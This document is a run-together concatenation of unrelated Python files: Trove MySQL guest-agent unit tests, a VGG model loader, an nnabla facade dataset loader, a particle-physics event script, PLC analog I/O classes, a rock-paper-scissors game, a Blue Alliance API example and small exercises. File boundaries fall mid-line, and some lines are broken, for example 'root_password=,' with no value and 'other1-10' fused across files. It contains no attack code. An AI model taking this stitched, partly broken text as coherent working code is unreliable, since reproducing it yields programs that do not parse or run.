test_prepare_device_path_false(self): self._prepare_dynamic(device_path=None) def test_prepare_device_path_mounted(self): self._prepare_dynamic(is_mounted=True) def test_prepare_mysql_not_installed(self): self._prepare_dynamic(is_mysql_installed=False) def test_prepare_mysql_from_backup(self): self._prepare_dynamic(backup_id='backup_id_123abc') def test_prepare_mysql_from_backup_with_root(self): self._prepare_dynamic(backup_id='backup_id_123abc', is_root_enabled=True) def test_prepare_mysql_with_root_password(self): 
self._prepare_dynamic(root_password='') def test_prepare_mysql_with_users_and_databases(self): self._prepare_dynamic(databases=['db1'], users=['user1']) def test_prepare_mysql_with_snapshot(self): snapshot = {'replication_strategy': self.replication_strategy, 'dataset': {'dataset_size': 1.0}, 'config': None} total_size = snapshot['dataset']['dataset_size'] + 1 self.mock_gfvs_class.return_value = {'total': total_size} self._prepare_dynamic(snapshot=snapshot) @patch.multiple(dbaas.MySqlAdmin, create_user=DEFAULT, create_database=DEFAULT, enable_root=DEFAULT) @patch.object(backup, 'restore') def _prepare_dynamic(self, restore_mock, create_user, create_database, enable_root, device_path='/dev/vdb', is_mysql_installed=True, backup_id=None, is_root_enabled=False, root_password=, overrides=None, is_mounted=False, databases=None, users=None, snapshot=None): # covering all outcomes is starting to cause trouble here COUNT = 1 if device_path else 0 backup_info = None if backup_id is not None: backup_info = {'id': backup_id, 'location': 'fake-location', 'type': 'InnoBackupEx', 'checksum': 'fake-checksum', } # TODO(juice): this should stub an instance of the MySqlAppStatus mock_status = MagicMock() dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) mock_status.begin_install = MagicMock(return_value=None) VolumeDevice.format = MagicMock(return_value=None) VolumeDevice.migrate_data = MagicMock(return_value=None) VolumeDevice.mount = MagicMock(return_value=None) mount_points = [] if is_mounted: mount_points = ['/mnt'] VolumeDevice.mount_points = MagicMock(return_value=mount_points) VolumeDevice.unmount = MagicMock(return_value=None) set_data_dir_patcher = patch.object(dbaas.MySqlApp, 'set_data_dir', return_value='/var/lib/mysql') self.addCleanup(set_data_dir_patcher.stop) set_data_dir_patcher.start() dbaas.MySqlApp.stop_db = MagicMock(return_value=None) dbaas.MySqlApp.start_mysql = MagicMock(return_value=None) dbaas.MySqlApp.update_overrides = MagicMock(return_value=None) dbaas.MySqlApp.install_if_needed = MagicMock(return_value=None) dbaas.MySqlApp.secure = MagicMock(return_value=None) dbaas.MySqlApp.secure_root = MagicMock(return_value=None) pkg.Package.pkg_is_installed = MagicMock( return_value=is_mysql_installed) operating_system.chown = MagicMock(return_value=None) os.path.exists = MagicMock(return_value=True) mock_replication = MagicMock() mock_replication.enable_as_slave = MagicMock() self.mock_rs_class.return_value = mock_replication with patch.object(dbaas.MySqlAdmin, 'is_root_enabled', return_value=is_root_enabled): self.manager.prepare(context=self.context, packages=None, memory_mb='2048', databases=databases, users=users, device_path=device_path, mount_point='/var/lib/mysql', backup_info=backup_info, root_password=, overrides=overrides, cluster_config=None, snapshot=snapshot) # verification/assertion mock_status.begin_install.assert_any_call() self.assertEqual(COUNT, VolumeDevice.format.call_count) self.assertEqual(COUNT, VolumeDevice.migrate_data.call_count) self.assertEqual(COUNT, VolumeDevice.mount_points.call_count) self.assertEqual(COUNT, dbaas.MySqlApp.stop_db.call_count) if is_mounted: self.assertEqual(1, VolumeDevice.unmount.call_count) else: self.assertEqual(0, VolumeDevice.unmount.call_count) if backup_info: restore_mock.assert_any_call(self.context, backup_info, '/var/lib/mysql/data') dbaas.MySqlApp.install_if_needed.assert_any_call(None) # We don't need to make sure the exact contents are there dbaas.MySqlApp.secure.assert_any_call(None) 
dbaas.MySqlApp.secure_root.assert_any_call( secure_remote_root=not is_root_enabled) if root_password: dbaas.MySqlAdmin.enable_root.assert_any_call(root_password) if databases: dbaas.MySqlAdmin.create_database.assert_any_call(databases) else: self.assertFalse(dbaas.MySqlAdmin.create_database.called) if users: dbaas.MySqlAdmin.create_user.assert_any_call(users) else: self.assertFalse(dbaas.MySqlAdmin.create_user.called) if snapshot: self.assertEqual(1, mock_replication.enable_as_slave.call_count) else: self.assertEqual(0, mock_replication.enable_as_slave.call_count) def test_get_replication_snapshot(self): mock_status = MagicMock() dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) snapshot_id = 'my_snapshot_id' log_position = 123456789 master_ref = 'my_master' used_size = 1.0 total_size = 2.0 mock_replication = MagicMock() mock_replication.enable_as_master = MagicMock() mock_replication.snapshot_for_replication = MagicMock( return_value=(snapshot_id, log_position)) mock_replication.get_master_ref = MagicMock( return_value=master_ref) self.mock_rs_class.return_value = mock_replication self.mock_gfvs_class.return_value = ( {'used': used_size, 'total': total_size}) expected_replication_snapshot = { 'dataset': { 'datastore_manager': self.manager.manager, 'dataset_size': used_size, 'volume_size': total_size, 'snapshot_id': snapshot_id }, 'replication_strategy': self.replication_strategy, 'master': master_ref, 'log_position': log_position } snapshot_info = None replica_source_config = None # entry point replication_snapshot = ( self.manager.get_replication_snapshot(self.context, snapshot_info, replica_source_config)) # assertions self.assertEqual(expected_replication_snapshot, replication_snapshot) self.assertEqual(1, mock_replication.enable_as_master.call_count) self.assertEqual( 1, mock_replication.snapshot_for_replication.call_count) self.assertEqual(1, mock_replication.get_master_ref.call_count) def test_attach_replication_slave_valid(self): mock_status = MagicMock() dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) total_size = 2.0 dataset_size = 1.0 mock_replication = MagicMock() mock_replication.enable_as_slave = MagicMock() self.mock_rs_class.return_value = mock_replication self.mock_gfvs_class.return_value = {'total': total_size} snapshot = {'replication_strategy': self.replication_strategy, 'dataset': {'dataset_size': dataset_size}} # entry point self.manager.attach_replica(self.context, snapshot, None) # assertions self.assertEqual(1, mock_replication.enable_as_slave.call_count) @patch('trove.guestagent.datastore.mysql_common.manager.LOG') def test_attach_replication_slave_invalid(self, *args): mock_status = MagicMock() dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) total_size = 2.0 dataset_size = 3.0 mock_replication = MagicMock() mock_replication.enable_as_slave = MagicMock() self.mock_rs_class.return_value = mock_replication self.mock_gfvs_class.return_value = {'total': total_size} snapshot = {'replication_strategy': self.replication_strategy, 'dataset': {'dataset_size': dataset_size}} # entry point self.assertRaises(InsufficientSpaceForReplica, self.manager.attach_replica, self.context, snapshot, None) # assertions self.assertEqual(0, mock_replication.enable_as_slave.call_count) def test_detach_replica(self): mock_status = MagicMock() dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) mock_replication = MagicMock() mock_replication.detach_slave = MagicMock() self.mock_rs_class.return_value = mock_replication # entry point 
self.manager.detach_replica(self.context) # assertions self.assertEqual(1, mock_replication.detach_slave.call_count) def test_demote_replication_master(self): mock_status = MagicMock() dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) mock_replication = MagicMock() mock_replication.demote_master = MagicMock() self.mock_rs_class.return_value = mock_replication # entry point self.manager.demote_replication_master(self.context) # assertions self.assertEqual(1, mock_replication.demote_master.call_count) def test_get_master_UUID(self): app = dbaas.MySqlApp(None) def test_case(slave_status, expected_value): with patch.object(dbaas.MySqlApp, '_get_slave_status', return_value=slave_status): assert_equal(app._get_master_UUID(), expected_value) test_case({'Master_UUID': '2a5b-2064-32fb'}, '2a5b-2064-32fb') test_case({'Master_UUID': ''}, None) test_case({}, None) def test_get_last_txn(self): def test_case(gtid_list, expected_value): with patch.object(dbaas.MySqlApp, '_get_gtid_executed', return_value=gtid_list): txn = self.manager.get_last_txn(self.context) assert_equal(txn, expected_value) with patch.object(dbaas.MySqlApp, '_get_slave_status', return_value={'Master_UUID': '2a5b-2064-32fb'}): test_case('2a5b-2064-32fb:1', ('2a5b-2064-32fb', 1)) test_case('2a5b-2064-32fb:1-5', ('2a5b-2064-32fb', 5)) test_case('2a5b-2064-32fb:1,4b4-23:5', ('2a5b-2064-32fb', 1)) test_case('4b4-23:5,2a5b-2064-32fb:1', ('2a5b-2064-32fb', 1)) test_case('4b-23:5,2a5b-2064-32fb:1,25:3-4', ('2a5b-2064-32fb', 1)) test_case('4b4-23:1-5,2a5b-2064-32fb:1-10', ('2a5b-2064-32fb', 10)) with patch.object(dbaas.MySqlApp, '_get_slave_status', return_value={'Master_UUID': ''}): test_case('2a5b-2064-32fb:1', (None, 0)) with patch.object(dbaas.MySqlApp, '_get_slave_status', return_value={}): test_case('2a5b-2064-32fb:1', (None, 0)) def test_rpc_ping(self): self.assertTrue(self.manager.rpc_ping(self.context)) @patch.object(dbaas.MySqlAdmin, 'change_passwords') def test_change_passwords(self, change_passwords_mock): self.manager.change_passwords( self.context, [{'name': 'test_user', 'password': ''}]) change_passwords_mock.assert_any_call( [{'name': 'test_user', 'password': ''}]) @patch.object(dbaas.MySqlAdmin, 'update_attributes') def test_update_attributes(self, update_attr_mock): self.manager.update_attributes(self.context, 'test_user', '%', {'password': ''}) update_attr_mock.assert_any_call('test_user', '%', {'password': ''}) @patch.object(dbaas.MySqlApp, 'reset_configuration') def test_reset_configuration(self, reset_config_mock): dbaas.MySqlAppStatus.get = MagicMock(return_value=MagicMock()) configuration = {'config_contents': 'some junk'} self.manager.reset_configuration(self.context, configuration) dbaas.MySqlAppStatus.get.assert_any_call() reset_config_mock.assert_any_call({'config_contents': 'some junk'}) @patch.object(dbaas.MySqlAdmin, 'revoke_access') def test_revoke_access(self, revoke_access_mock): self.manager.revoke_access(self.context, 'test_user', '%', 'test_db') revoke_access_mock.assert_any_call('test_user', '%', 'test_db') @patch.object(dbaas.MySqlAdmin, 'list_access', return_value=['database1']) def test_list_access(self, list_access_mock): access = self.manager.list_access(self.context, 'test_user', '%') self.assertEqual(list_access_mock.return_value, access) list_access_mock.assert_any_call('test_user', '%') @patch.object(dbaas.MySqlApp, 'restart') def test_restart(self, restart_mock): mock_status = MagicMock() self.manager.appStatus = mock_status dbaas.MySqlAppStatus.get = 
MagicMock(return_value=mock_status) self.manager.restart(self.context) dbaas.MySqlAppStatus.get.assert_any_call() restart_mock.assert_any_call() @patch.object(dbaas.MySqlApp, 'start_db_with_conf_changes') def test_start_db_with_conf_changes(self, start_db_mock): mock_status = MagicMock() configuration = {'config_contents': 'some junk'} self.manager.appStatus = mock_status dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) self.manager.start_db_with_conf_changes(self.context, configuration) dbaas.MySqlAppStatus.get.assert_any_call() start_db_mock.assert_any_call({'config_contents': 'some junk'}) def test_stop_db(self): mock_status = MagicMock() self.manager.appStatus = mock_status dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) dbaas.MySqlApp.stop_db = MagicMock(return_value=None) self.manager.stop_db(self.context) dbaas.MySqlAppStatus.get.assert_any_call() dbaas.MySqlApp.stop_db.assert_any_call(do_not_start_on_reboot=False) def test_get_filesystem_stats(self): with patch.object(base_dbaas, 'get_filesystem_volume_stats'): self.manager.get_filesystem_stats(self.context, '/var/lib/mysql') base_dbaas.get_filesystem_volume_stats.assert_any_call( '/var/lib/mysql') def test_mount_volume(self): with patch.object(volume.VolumeDevice, 'mount', return_value=None): self.manager.mount_volume(self.context, device_path='/dev/vdb', mount_point='/var/lib/mysql') test_mount = volume.VolumeDevice.mount.call_args_list[0] test_mount.assert_called_with('/var/lib/mysql', False) def test_unmount_volume(self): with patch.object(volume.VolumeDevice, 'unmount', return_value=None): self.manager.unmount_volume(self.context, device_path='/dev/vdb') test_unmount = volume.VolumeDevice.unmount.call_args_list[0] test_unmount.assert_called_with('/var/lib/mysql') def test_resize_fs(self): with patch.object(volume.VolumeDevice, 'resize_fs', return_value=None): self.manager.resize_fs(self.context, device_path='/dev/vdb') test_resize_fs = volume.VolumeDevice.resize_fs.call_args_list[0] test_resize_fs.assert_called_with('/var/lib/mysql') @patch.object(dbaas.MySqlApp, 'remove_overrides') def test_update_overrides(self, remove_config_mock): mock_status = MagicMock() self.manager.appStatus = mock_status dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) dbaas.MySqlApp.update_overrides = MagicMock(return_value=None) self.manager.update_overrides(self.context, 'something_overrides') dbaas.MySqlAppStatus.get.assert_any_call() remove_config_mock.assert_not_called() dbaas.MySqlApp.update_overrides.assert_any_call('something_overrides') @patch.object(dbaas.MySqlApp, 'remove_overrides') def test_update_overrides_with_remove(self, remove_overrides_mock): mock_status = MagicMock() self.manager.appStatus = mock_status dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) dbaas.MySqlApp.update_overrides = MagicMock(return_value=None) self.manager.update_overrides(self.context, 'something_overrides', True) dbaas.MySqlAppStatus.get.assert_any_call() remove_overrides_mock.assert_any_call() dbaas.MySqlApp.update_overrides.assert_any_call('something_overrides') @patch.object(dbaas.MySqlApp, 'apply_overrides') def test_apply_overrides(self, apply_overrides_mock): mock_status = MagicMock() override = {'some_key': 'some value'} self.manager.appStatus = mock_status dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) self.manager.apply_overrides(self.context, override) dbaas.MySqlAppStatus.get.assert_any_call() apply_overrides_mock.assert_any_call({'some_key': 'some value'}) 
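# The tests in this class all follow the same unittest.mock pattern: patch.object
# swaps a single real attribute for a MagicMock for the duration of one test and
# hands the mock to the test body (as a decorator argument or via a with-block).
# A minimal, self-contained sketch of that pattern (illustrative only, not part
# of this test suite):
#
#     from unittest.mock import patch
#
#     class Engine(object):
#         def start(self):
#             return "real"
#
#     with patch.object(Engine, 'start', return_value='mocked') as start_mock:
#         assert Engine().start() == 'mocked'
#         start_mock.assert_called_once_with()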
@patch.object(dbaas.MySqlApp, 'get_txn_count', return_value=(9879)) def test_get_txn_count(self, get_txn_count_mock): mock_status = MagicMock() self.manager.appStatus = mock_status dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) txn_count = self.manager.get_txn_count(self.context) self.assertEqual(get_txn_count_mock.return_value, txn_count) dbaas.MySqlAppStatus.get.assert_any_call() get_txn_count_mock.assert_any_call() @patch.object(dbaas.MySqlApp, 'get_latest_txn_id', return_value=('2a5b-2064-32fb:1')) def test_get_latest_txn_id(self, get_latest_txn_id_mock): mock_status = MagicMock() self.manager.appStatus = mock_status dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) latest_txn_id = self.manager.get_latest_txn_id(self.context) self.assertEqual(get_latest_txn_id_mock.return_value, latest_txn_id) dbaas.MySqlAppStatus.get.assert_any_call() get_latest_txn_id_mock.assert_any_call() @patch.object(dbaas.MySqlApp, 'wait_for_txn') def test_wait_for_txn(self, wait_for_txn_mock): mock_status = MagicMock() self.manager.appStatus = mock_status dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) self.manager.wait_for_txn(self.context, '4b4-23:5,2a5b-2064-32fb:1') dbaas.MySqlAppStatus.get.assert_any_call() wait_for_txn_mock.assert_any_call('4b4-23:5,2a5b-2064-32fb:1') @patch.object(dbaas.MySqlApp, 'make_read_only') def test_make_read_only(self, make_read_only_mock): mock_status = MagicMock() self.manager.appStatus = mock_status dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) self.manager.make_read_only(self.context, 'ON') dbaas.MySqlAppStatus.get.assert_any_call() make_read_only_mock.assert_any_call('ON') def test_cleanup_source_on_replica_detach(self): mock_replication = MagicMock() mock_replication.cleanup_source_on_replica_detach = MagicMock() self.mock_rs_class.return_value = mock_replication snapshot = {'replication_strategy': self.replication_strategy, 'dataset': {'dataset_size': '1.0'}} # entry point self.manager.cleanup_source_on_replica_detach(self.context, snapshot) # assertions self.assertEqual( 1, mock_replication.cleanup_source_on_replica_detach.call_count) def test_get_replica_context(self): replication_user = { 'name': 'repl_user', 'password': '' } master_ref = { 'host': '1.2.3.4', 'port': 3306 } rep_info = { 'master': master_ref, 'log_position': { 'replication_user': replication_user } } mock_replication = MagicMock() mock_replication.get_replica_context = MagicMock(return_value=rep_info) self.mock_rs_class.return_value = mock_replication # entry point replica_info = self.manager.get_replica_context(self.context) # assertions self.assertEqual(1, mock_replication.get_replica_context.call_count) self.assertEqual(rep_info, replica_info) def test_enable_as_master(self): mock_replication = MagicMock() mock_replication.enable_as_master = MagicMock() self.mock_rs_class.return_value = mock_replication # entry point self.manager.enable_as_master(self.context, None) # assertions self.assertEqual(mock_replication.enable_as_master.call_count, 1) @patch('trove.guestagent.datastore.mysql_common.manager.LOG') def test__perform_restore(self, *args): backup_info = {'id': 'backup_id_123abc', 'location': 'fake-location', 'type': 'InnoBackupEx', 'checksum': 'fake-checksum', } mock_status = MagicMock() self.manager.appStatus = mock_status dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) app = dbaas.MySqlApp(dbaas.MySqlAppStatus.get()) with patch.object(backup, 'restore', side_effect=ProcessExecutionError): 
self.assertRaises(ProcessExecutionError, self.manager._perform_restore, backup_info, self.context, '/var/lib/mysql', app) app.status.set_status.assert_called_with( rd_instance.ServiceStatuses.FAILED) def program1(x): total = 0 for i in range(1000): total += i while x > 0: x -= 1 total += x return total print(program1(0))#!/usr/bin/env python # -*- coding: utf-8 -*- # @Author: zcy # @Date: 2019-01-13 16:54:20 # @Last Modified by: zcy # @Last Modified time: 2019-02-11 11:52:32 import logging # 引入logging模块 import os import torch.utils.model_zoo as model_zoo from torch import load as TorchLoad from models.classifiers.Vgg_module import vgg_Net # python语法:限制允许从本模块导入的东西 __all__ = [ 'vgg11', 'vgg13', 'vgg16', 'vgg19' ] # 预训练模型的下载地址 # 只要带有bn的 model_urls = { 'vgg11': 'https://download.pytorch.org/models/vgg11_bn-6002323d.pth', 'vgg13': 'https://download.pytorch.org/models/vgg13_bn-abd245e5.pth', 'vgg16': 'https://download.pytorch.org/models/vgg16_bn-6c64b313.pth', 'vgg19': 'https://download.pytorch.org/models/vgg19_bn-c79401a0.pth', } model_names = { 'vgg11': 'vgg11_bn-6002323d.pth', 'vgg13': 'vgg13_bn-abd245e5.pth', 'vgg16': 'vgg16_bn-6c64b313.pth', 'vgg19': 'vgg19_bn-c79401a0.pth', } ''' 记录了不同的vgg结构 number: convolution layer's output channel 'M': MaxPool layer ''' vgg_cfg = { 'A': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'], 'B': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'], 'D': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'], 'E': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'], } def isValidParam(param): ''' check param is valid or not ''' if param['img_height']%32!=0: logging.info("图片长宽应该设定为32的倍数,比如32 64 512这样的值,可是现在却是 %d " %param['img_height']) logging.error("images height must be 32's multiple, but you set it to %d " %param['img_height']) return False if param['img_width']%32!=0: logging.info("图片长宽应该设定为32的倍数,比如32 64 512这样的值,可是现在却是 %d " %param['img_width']) logging.error(" images width must be 32's multiple, but you set it to %d " %param['img_width']) return False return True def check_param(param): if not isValidParam(param): raise RuntimeError('Error in parameter setting') def get_vgg(Net_cfg, Net_urls, file_name, n_class, pretrained=False, img_size=(224, 224), pretrained_path="./pretrained/"): ''' Net_cfg:网络结构 Net_urls:预训练模型的url file_name:预训练模型的名字 n_class:输出类别 pretrained:是否使用预训练模型 param为字典,包含网络需要的参数 param['img_height']: image's height, must be 32's multiple param['img_width']: image's weight, must be 32's multiple ''' if isinstance(img_size, (tuple, list)): h, w = img_size[0], img_size[1] else: h = w = img_size param = {'img_height':h, 'img_width':w} check_param(param) model = vgg_Net(Net_cfg, param) #先建立一个跟预训练模型一样的网络 model.img_size = (h, w) if pretrained: if os.path.exists(os.path.join(pretrained_path, file_name)): model.load_state_dict(TorchLoad(os.path.join(pretrained_path, file_name))) logging.info("Find local model file, load model from local !!") logging.info("找到本地下载的预训练模型!!直接载入!!") else: logging.info("pretrained 文件夹下没有,从网上下载 !!") model.load_state_dict(model_zoo.load_url(Net_urls, model_dir = pretrained_path)) logging.info("下载完毕!!载入权重!!") model.adjust_classifier(n_class) #调整全连接层,迁移学习 return model def vgg11(n_class, img_size=(224, 224), pretrained=False, pretrained_path="./pretrained/"): return get_vgg(vgg_cfg['A'], model_urls['vgg11'], model_names['vgg11'], n_class, pretrained, img_size, pretrained_path) def vgg13(n_class, img_size=(224, 
224), pretrained=False, pretrained_path="./pretrained/"): return get_vgg(vgg_cfg['B'], model_urls['vgg13'], model_names['vgg13'], n_class, pretrained, img_size, pretrained_path) def vgg16(n_class, img_size=(224, 224), pretrained=False, pretrained_path="./pretrained/"): return get_vgg(vgg_cfg['D'], model_urls['vgg16'], model_names['vgg16'], n_class, pretrained, img_size, pretrained_path) def vgg19(n_class, img_size=(224, 224), pretrained=False, pretrained_path="./pretrained/"): return get_vgg(vgg_cfg['E'], model_urls['vgg19'], model_names['vgg19'], n_class, pretrained, img_size, pretrained_path) k = int(input()) l = int(input()) m = int(input()) n = int(input()) d = int(input()) count = d for i in range(d, -1, -1): if ((i % k != 0) and (i % l != 0) and (i % m != 0) and (i % n != 0)): count -= 1 print(count) JonathanLehner/nnabla-examplesGANs/pix2pix/facade.py # Copyright (c) 2017 Sony Corporation. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import glob import shutil import numpy as np import six import urllib.request as request import tqdm import zipfile from PIL import Image import nnabla.logger as logger from nnabla.utils.data_iterator import data_iterator from nnabla.utils.data_source import DataSource class FacadeDataSource(DataSource): DATASET_NAME = 'facades' URLs = ['http://cmp.felk.cvut.cz/~tylecr1/facade/CMP_facade_DB_base.zip', 'http://cmp.felk.cvut.cz/~tylecr1/facade/CMP_facade_DB_extended.zip'] DEFAULT_DATASET_ROOT_PATH = './datasets' DEFAULT_TRAIN_ROOT_PATH = DEFAULT_DATASET_ROOT_PATH + '/' + DATASET_NAME + '/train' DEFAULT_VAL_ROOT_PATH = DEFAULT_DATASET_ROOT_PATH + '/' + DATASET_NAME + '/val' DEFAULT_TEST_ROOT_PATH = DEFAULT_DATASET_ROOT_PATH + '/' + DATASET_NAME + '/test' def __init__(self, images_root_path=None, cropsize=(256, 256), random_crop=True, shuffle=True, rng=None): super(FacadeDataSource, self).__init__(shuffle=shuffle, rng=rng) if images_root_path is None: images_root_path = FacadeDataSource.DEFAULT_TRAIN_ROOT_PATH if not os.path.exists(images_root_path): self.download() self._facade_images = glob.glob(images_root_path + '/*.jpg') self._crop_size = cropsize self._random_crop = random_crop self._size = len(self._facade_images) self._variables = ('x', 'y') # should be defined self.reset() # should be called def download(self, train=400, val=100): # Load Facade Image Data facade_raw = os.path.join( FacadeDataSource.DEFAULT_DATASET_ROOT_PATH, FacadeDataSource.DATASET_NAME, 'raw') if (not os.path.exists(FacadeDataSource.DEFAULT_TRAIN_ROOT_PATH) or not os.path.exists(FacadeDataSource.DEFAULT_VAL_ROOT_PATH) or not os.path.exists(FacadeDataSource.DEFAULT_TEST_ROOT_PATH)): # Make Default Dataset Root Directory if not os.path.exists(FacadeDataSource.DEFAULT_DATASET_ROOT_PATH): os.makedirs(FacadeDataSource.DEFAULT_DATASET_ROOT_PATH) # Download for url in FacadeDataSource.URLs: logger.info('Downloading Dataset from {0:s}...'.format(url)) download_path = os.path.join( FacadeDataSource.DEFAULT_DATASET_ROOT_PATH, os.path.basename(url)) # Make Download 
Progress Bar tsize = int(request.urlopen(url).headers.get('Content-Length')) with tqdm.tqdm(total=tsize) as bar: def update_bar(bcount, bsize, total, bar=bar): return bar.update( bsize) six.moves.urllib.request.urlretrieve( url, download_path, reporthook=update_bar) # Extract Dataset with zipfile.ZipFile(download_path, 'r') as zfile: zfile.extractall(path=facade_raw) # split into train/val/test dataset image_paths = [] for d in [_d for _d in glob.glob(facade_raw+'/*') if os.path.isdir(_d)]: image_paths.extend(glob.glob(d + '/*.jpg')) self._rng.shuffle(image_paths) test = len(image_paths) - \ (train + val) if len(image_paths) > (train + val) else 0 for n, d in zip( [train, val, test], [FacadeDataSource.DEFAULT_TRAIN_ROOT_PATH, FacadeDataSource.DEFAULT_VAL_ROOT_PATH, FacadeDataSource.DEFAULT_TEST_ROOT_PATH]): if not os.path.exists(d): os.makedirs(d) for i in range(n): image_p = image_paths.pop() label_p = os.path.splitext(image_p)[0] + '.png' shutil.copy(image_p, d) shutil.copy(label_p, d) else: logger.info('Facade Dataset is already downloaded.') def _get_data(self, position): # Load from Filename idx = self._indexes[position] label_name = os.path.splitext(self._facade_images[idx])[0] + '.png' image = Image.open(self._facade_images[idx]) _label = Image.open(label_name) # Resize Images w, h = image.size r = 286. / min(w, h) image = image.resize((int(r*w), int(r*h)), Image.BILINEAR) image = np.asarray(image).astype('f').transpose(2, 0, 1) _label = _label.resize((int(r*w), int(r*h)), Image.NEAREST) _label = np.asarray(_label) - 1 # Normalize Image image = image / 128.0 - 1.0 # random crop c, h, w = image.shape ch, cw = self._crop_size top_left = (self._rng.randint(0, h-ch), self._rng.randint(0, w-cw)) if self._random_crop else (0, 0) image = image[:, top_left[0]:top_left[0] + ch, top_left[1]:top_left[1]+cw] _label = _label[top_left[0]:top_left[0]+ch, top_left[1]:top_left[1]+cw] # Make Label Image label = np.zeros((12, image.shape[1], image.shape[2])).astype("i") for i in range(12): label[i, :] = _label == i return (image, label) def reset(self): # reset method initialize self._indexes if self._shuffle: self._indexes = self._rng.permutation(self._size) else: self._indexes = np.arange(self._size) super(FacadeDataSource, self).reset() def facade_data_iterator( images_root_path, batch_size, random_crop=True, shuffle=True, rng=None, with_memory_cache=True, with_file_cache=False): return data_iterator(FacadeDataSource(images_root_path, random_crop=random_crop, shuffle=shuffle, rng=rng), batch_size, rng, with_memory_cache, with_file_cache) kotania/impy import sys import os import numpy as np root_dir = os.path.abspath(os.path.dirname(__file__)) sys.path.append(root_dir) sys.path.append(os.path.join(root_dir, '../DPMJET-III-gitlab')) from impy.definitions import * from impy.constants import * from impy.kinematics import EventKinematics from impy import impy_config, pdata # AF: This is what the user interaction has to yield. # It is the typical expected configuration that one # wants to run (read pp-mode at energies not exceeding # 7 TeV). If you want cosmic ray energies, this should # be rather p-N at 10 EeV and lab frame (not yet defined). 
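# Descriptive note: the block below configures centre-of-momentum pp collisions
# at ecm = 7 TeV (both beams are protons, PDG id 2212), asks impy to report
# particles in the laboratory frame, and then draws events from the SIBYLL 2.3C
# generator selected via interaction_model_by_tag.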
event_kinematics = EventKinematics(ecm=7000 * GeV, p1pdg=2212, p2pdg=2212 # nuc2_prop=(14,7) ) impy_config["user_frame"] = 'laboratory' generator = make_generator_instance(interaction_model_by_tag['SIBYLL23C']) generator.init_generator(event_kinematics) # import IPython # IPython.embed() # This for event in generator.event_generator(event_kinematics, 2): # generator.lib.pydat3.mdcy[102 - 1, 0] = 1 import IPython IPython.embed() event.filter_final_state_charged() # print 'px', event.px # print 'py', event.py # print 'pz', event.pz # print 'en', event.en print 'p_ids', event.p_ids # print 'impact param', event.impact_parameter from controlpyweb.io_definitions.single_io import SingleIO from controlpyweb.io_definitions.io_out import IOOut from controlpyweb.abstract_reader_writer import AbstractReaderWriter class AnalogIn(SingleIO): def __init__(self, name: str, addr: str, default: float = 0.0, reader: AbstractReaderWriter = None, *args, **kwargs): super().__init__(name, addr, default, reader, *args, **kwargs) @staticmethod def _convert_type(value): return float(value) def __mod__(self, other): if hasattr(other, 'value'): other = other.value return self.value % other class AnalogOut(IOOut, AnalogIn): def __init__(self, name: str, addr: str, default: float = 0.0, reader: AbstractReaderWriter = None, *args, **kwargs): super().__init__(name, addr, default, reader, *args, **kwargs) @staticmethod def _convert_type(value): return float(value) def __mod__(self, other): if hasattr(other, 'value'): other = other.value return self.value % other1-10 #Exercício Python 45: Crie um programa que faça o computador jogar Jokenpô com você. from random import randint from time import sleep escolha = ['Pedra', 'Papel', 'Tesoura'] computador = randint(0, 2) jogador = int(input("""Jogue: [ 1 ] - Pedra [ 2 ] - Papel [ 3 ] - Tesoura """)) - 1 print("JO") sleep(1) print("KEN") sleep(1) print("PO") sleep(1) if computador == 0: if jogador == 0: print(f"Empate! {escolha[computador]} x {escolha[jogador]}") elif jogador == 1: print(f"Jogador ganhou! {escolha[computador]} é coberta pelo {escolha[jogador]}") elif jogador == 2: print(f"Computador ganhou! {escolha[computador]} quebra {escolha[jogador]}") elif computador == 1: if jogador == 0: print(f"Computador ganhou! {escolha[computador]} cobre {escolha[jogador]}") elif jogador == 1: print(f"Empate! {escolha[computador]} x {escolha[jogador]}") elif jogador == 2: print(f"Jogador ganhou! {escolha[computador]} é cortado pela {escolha[jogador]}") elif computador == 2: if jogador == 0: print(f"Jogador ganhou! {escolha[computador]} é quebrada pela {escolha[jogador]}") elif jogador == 1: print(f"Computador ganhou! {escolha[computador]} corta {escolha[jogador]}") elif jogador == 2: print(f"Empate! {escolha[computador]} x {escolha[jogador]}") else: print("Opção inválida:") 10-100 import tbapy import datetime # This key should ONLY be used for this example. If using this library in your own project, # follow the steps in the README to generate your own key. tba = tbapy.TBA('') team = tba.team(254) districts, last_modified = tba.team_districts(1418, last_modified=True) match = tba.match(year=2017, event='chcmp', type='sf', number=2, round=1) events = tba.team_events(148, 2016) robots = tba.team_robots(4131) print('-' * 10 + ' Object Syntax' + '-' * 10) print('Team 254 is from %s in %s, %s.' % (team.city, team.state_prov, team.country)) print('Team 1418 is/was in the %s district in the most recent year of competition.' 
